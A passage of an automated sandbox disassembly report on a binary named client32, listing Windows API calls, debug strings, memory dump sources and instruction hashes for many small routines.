                                                                                  • Error. preventing capbuf overflow, xrefs: 1100B6C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Error. NULL capbuf$Error. preventing capbuf overflow
                                                                                  • API String ID: 0-3856134272
                                                                                  • Opcode ID: a723116aa68a4b999a3597d1cc0fccb57ed2d6ff5a333340ea9ad9601b026ece
                                                                                  • Instruction ID: a4a4ce9073261333e851eebcc79e1773aa66005037fae8e918fe6f1657af3004
                                                                                  • Opcode Fuzzy Hash: a723116aa68a4b999a3597d1cc0fccb57ed2d6ff5a333340ea9ad9601b026ece
                                                                                  • Instruction Fuzzy Hash: C401207AA0060997D610CE54EC40ADBB398DB8036CF04483AE65E93501D271B491C6A6
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(00000001,WTSSendMessageA), ref: 1112D6F4
                                                                                  • SetLastError.KERNEL32(00000078,00000000,?,1113A569,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1112D735
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressErrorLastProc
                                                                                  • String ID: WTSSendMessageA
                                                                                  • API String ID: 199729137-1676301106
                                                                                  • Opcode ID: 7fb74c84802ba5a444731fdd007d56646f6016a01965a233a038b3bb232e74b6
                                                                                  • Instruction ID: 5748faf58fc4c309978bb3964bb976d1af77d24f32d17e8bed4b3b40d6b81985
                                                                                  • Opcode Fuzzy Hash: 7fb74c84802ba5a444731fdd007d56646f6016a01965a233a038b3bb232e74b6
                                                                                  • Instruction Fuzzy Hash: 7E014B72650618AFCB14DF98D880E9BB7E8EF8C721F018219F959D3640C630EC50CBA0
                                                                                  APIs
                                                                                  • wvsprintfA.USER32(?,?,00000000), ref: 110D1572
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                  • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                  • API String ID: 175691280-2052047905
                                                                                  • Opcode ID: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                                  • Instruction ID: b89aa90761fb3a94205c41d70d04c41302f16292cd1454487622bd2b1eadc16a
                                                                                  • Opcode Fuzzy Hash: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                                  • Instruction Fuzzy Hash: 0EF0A975A0025DABCF00DEE4DC40BFEFBAC9B85208F40419DF945A7240DE706A45C7A5
                                                                                  APIs
                                                                                  • SendMessageA.USER32(00000000,00001006,00000000,?), ref: 1101509D
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11015044
                                                                                  • m_hWnd, xrefs: 11015049
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                  • API String ID: 819365019-3966830984
                                                                                  • Opcode ID: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
                                                                                  • Instruction ID: f09b96a616f6a33d867b0b5af4e6941d1959c252ec7f828cb2a239631c18db6c
                                                                                  • Opcode Fuzzy Hash: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
                                                                                  • Instruction Fuzzy Hash: 1701A2B1D10219AFCB90CFA9C8457DEBBF4AB0C310F10816AE519F6240E67556808F94
                                                                                  APIs
                                                                                  • wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                  • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                  • API String ID: 175691280-2052047905
                                                                                  • Opcode ID: 80bf54f75d60de959a569c8df654b715eddbd256bd047d3a81eed0e5ac7c8735
                                                                                  • Instruction ID: d047ce25565584385d90dc1a88bf85935da342945f7d0a1e0c7239cac7a22c38
                                                                                  • Opcode Fuzzy Hash: 80bf54f75d60de959a569c8df654b715eddbd256bd047d3a81eed0e5ac7c8735
                                                                                  • Instruction Fuzzy Hash: 1AF0A475A0025CBBCB00DED4DC40BEEFBA8AB45208F004099F549A7140DE706A55C7A9
                                                                                  APIs
                                                                                  • SetPropA.USER32(?,?,?), ref: 1115F395
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastMessageProcessPropwsprintf
                                                                                  • String ID: ..\ctl32\wndclass.cpp$p->m_hWnd
                                                                                  • API String ID: 1134434899-3115850912
                                                                                  • Opcode ID: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                                  • Instruction ID: 87c86bef28f98f72f88127ca4e69caffea3bfce03f9a6da2004c13aaf4101256
                                                                                  • Opcode Fuzzy Hash: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                                  • Instruction Fuzzy Hash: FCF0E575BC0336B7D7509A66DC82FE6F358D722BA4F448016FC26A2141F274E980C2D2
                                                                                  APIs
                                                                                  • SendMessageA.USER32(00000000,0000102D,00000000,?), ref: 11015229
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151F4
                                                                                  • m_hWnd, xrefs: 110151F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                  • API String ID: 819365019-3966830984
                                                                                  • Opcode ID: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                                  • Instruction ID: 9699e87d833f238af44183ea9879e136ee952ee53a84507d201ef9d6a93955d8
                                                                                  • Opcode Fuzzy Hash: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                                  • Instruction Fuzzy Hash: 19F0FEB5D0025DABCB14DF95DC85EDAB7F8EB4D310F00852AFD29A7240E770A950CBA5
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 110173E4
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11017409
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressErrorLastProc
                                                                                  • String ID: QueueUserWorkItem
                                                                                  • API String ID: 199729137-2469634949
                                                                                  • Opcode ID: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                  • Instruction ID: 14daf5f2905bb7c6da6366d36066c9679ffc6904d36036c61edd8dc8337596d2
                                                                                  • Opcode Fuzzy Hash: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                  • Instruction Fuzzy Hash: 06F01C72A50628AFD714DFA4D948E9BB7E8FB54721F00852AFD5597A04C774F840CBA0
                                                                                  APIs
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • CreateThread.KERNEL32(00000000,00000000,11027530,00000000,00000000,00000000), ref: 110297DE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread__wcstoi64
                                                                                  • String ID: *TapiFixPeriod$Bridge
                                                                                  • API String ID: 1152747075-2058455932
                                                                                  • Opcode ID: 5b6fa3ef66d65aabb834f1bac3e66e018aa2f987c08b040d8e6299ac416ecad2
                                                                                  • Instruction ID: 741f43c1c8d280c886d6f15773e052eeed2c6ce1e0fea61ed055b6fa2ceaecb0
                                                                                  • Opcode Fuzzy Hash: 5b6fa3ef66d65aabb834f1bac3e66e018aa2f987c08b040d8e6299ac416ecad2
                                                                                  • Instruction Fuzzy Hash: 24F0ED39B42338ABE711CEC1DC42F71B698A300708F0004B8F628A91C9E6B0A90083A6
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(?,FlashWindowEx), ref: 1101D334
                                                                                  • SetLastError.KERNEL32(00000078), ref: 1101D351
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressErrorLastProc
                                                                                  • String ID: FlashWindowEx
                                                                                  • API String ID: 199729137-2859592226
                                                                                  • Opcode ID: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                                  • Instruction ID: 7fa6031e8bb94c9d2945b427b42de2899da1a72ad2875e3a9dcb47a7bac4ba5f
                                                                                  • Opcode Fuzzy Hash: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                                  • Instruction Fuzzy Hash: 83E01272A412389FD324EBE9A848B4AF7E89B54765F01442AEA5597904C675E8408B90
                                                                                  APIs
                                                                                  • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010C7
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010A1
                                                                                  • m_hWnd, xrefs: 110010A6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 2046328329-2830328467
                                                                                  • Opcode ID: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                                  • Instruction ID: 55addf44b20248d1cdc7b1377ce96882c1c4f69405d532d8ba5fa0b62c56eca9
                                                                                  • Opcode Fuzzy Hash: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                                  • Instruction Fuzzy Hash: 8DE01AB661021DBFD714DE85EC81EEBB3ECEB49354F008529FA2A97240D6B0E850C7A5
                                                                                  APIs
                                                                                  • SendMessageA.USER32(?,?,?,?), ref: 11001083
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001061
                                                                                  • m_hWnd, xrefs: 11001066
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 819365019-2830328467
                                                                                  • Opcode ID: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                                  • Instruction ID: 50f06fe94c134d50a88b9402c61dae4da10641179b5ac6344e644b67b4693846
                                                                                  • Opcode Fuzzy Hash: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                                  • Instruction Fuzzy Hash: 6AE04FB5A00219BBD710DE95DC45EDBB3DCEB48354F00842AF92597240D6B0F84087A0
                                                                                  APIs
                                                                                  • PostMessageA.USER32(?,?,?,?), ref: 11001113
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010F1
                                                                                  • m_hWnd, xrefs: 110010F6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 906220102-2830328467
                                                                                  • Opcode ID: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                                  • Instruction ID: 934a8ee4ae924c1029923c78eea6d07b507986f249d0d3e5c029bc3c62824ea9
                                                                                  • Opcode Fuzzy Hash: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                                  • Instruction Fuzzy Hash: 98E04FB5A10219BFD704CA85DC46EDAB39CEB48754F00802AF92597200D6B0E84087A0
                                                                                  APIs
                                                                                  • SendMessageA.USER32(?,00001014,?,?), ref: 110151D4
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151B1
                                                                                  • m_hWnd, xrefs: 110151B6
                                                                                  Memory Dump Source
